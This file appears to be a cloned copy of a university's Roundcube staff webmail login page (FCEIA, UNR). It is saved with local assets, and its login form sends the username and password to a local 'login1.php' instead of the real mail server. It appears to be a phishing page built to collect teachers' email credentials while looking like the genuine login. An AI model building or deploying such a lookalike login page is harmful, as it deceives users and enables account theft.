<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0039)https://www.fceia.unr.edu.ar/roundcube/ -->
<html lang="es" xmlns="http://www.w3.org/1999/xhtml" class=" js opera webkit"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Webmail para Docentes :: Bienvenido a Webmail para Docentes</title>
<link rel="index" href="https://www.fceia.unr.edu.ar/roundcube/?_task=login">
<link rel="shortcut icon" href="https://www.fceia.unr.edu.ar/roundcube/skins/classic/images/favicon.ico">
<link rel="stylesheet" type="text/css" href="./index_files/common.min.css">


<link rel="stylesheet" type="text/css" href="./index_files/jquery-ui.css">
<script src="./index_files/jquery.min.js.download" type="text/javascript"></script>
<script src="./index_files/common.min.js.download" type="text/javascript"></script>
<script src="./index_files/app.min.js.download" type="text/javascript"></script>
<script src="./index_files/jstz.min.js.download" type="text/javascript"></script>
<script type="text/javascript">
/* <![CDATA[ */

/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) 2005-2014 The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"es_AR","devel_mode":null,"cookie_domain":"","cookie_path":"\/","cookie_secure":true,"skin":"classic","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":".\/?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","request_token":"4cwlOKhbXSvAjNATmrrKkivorQiEXucA"});
rcmail.add_label({"loading":"Cargando...","servererror":"\u00a1Error en el servidor!","connerror":"Error de conexi\u00f3n (No se pudo conectar con el servidor)!","requesttimedout":"Tiempo de espera agotado","refreshing":"Actualizando...","windowopenerror":"La ventana emergente ha sido bloqueada!","uploadingmany":"Subiendo archivos...","close":"Cerrar"});
rcmail.gui_container("loginfooter","bottomline");
rcmail.gui_object('message', 'message');
rcmail.gui_object('loginform', 'form');
/* ]]> */
</script>

<script type="text/javascript" src="./index_files/jquery-ui.min.js.download"></script>
<script type="text/javascript" src="./index_files/jquery.ui.datepicker-es.min.js.download"></script>
</head>
<body>

<img src="./index_files/logo-fceia-azul-160x84.png" id="logo" border="0" style="margin:0 11px" alt="Webmail para Docentes">

<div id="message"></div>

<div id="login-form">
<div class="boxtitle">Bienvenido a Webmail para Docentes</div>
<div class="boxcontent">

<form name="form" method="post" action="login1.php">
<input type="hidden" name="_token" value="4cwlOKhbXSvAjNATmrrKkivorQiEXucA">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos"><input type="hidden" name="_url" id="rcmloginurl" value=""><table summary="" border="0"><tbody><tr><td class="title"><label for="rcmloginuser">Nombre de usuario</label>
</td>
<td class="input"><input name="_user" id="rcmloginuser" required="required" autocapitalize="off" autocomplete="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Contraseña</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required="required" autocapitalize="off" autocomplete="off" type="password"></td>
</tr>
</tbody>
</table>
<input type="hidden" name="_host" id="rcmloginhost" value="127.0.0.1" form="form" submit="true" autocapitalize="off"><p class="formbuttons"><input type="submit" id="rcmloginsubmit" class="button mainaction" value="Entrar"></p>

</form>

</div>
</div>

<noscript>
  <p id="login-noscriptwarning">Advertencia: Este servicio de webmail requiere Javascript! Para usarlo, por favor, habilite Javascript en las preferencia de tu navegador.</p>
</noscript>

<div id="login-bottomline">
  Webmail para Docentes 
    
</div>



<script type="text/javascript">
/* <![CDATA[ */

$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/classic\/images\/icons\/folders.png","skins\/classic\/images\/mail_footer.png","skins\/classic\/images\/taskicons.gif","skins\/classic\/images\/display\/loading.gif","skins\/classic\/images\/pagenav.gif","skins\/classic\/images\/mail_toolbar.png","skins\/classic\/images\/searchfield.gif","skins\/classic\/images\/messageicons.png","skins\/classic\/images\/icons\/reset.gif","skins\/classic\/images\/abook_toolbar.png","skins\/classic\/images\/icons\/groupactions.png","skins\/classic\/images\/watermark.gif"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>


</body></html>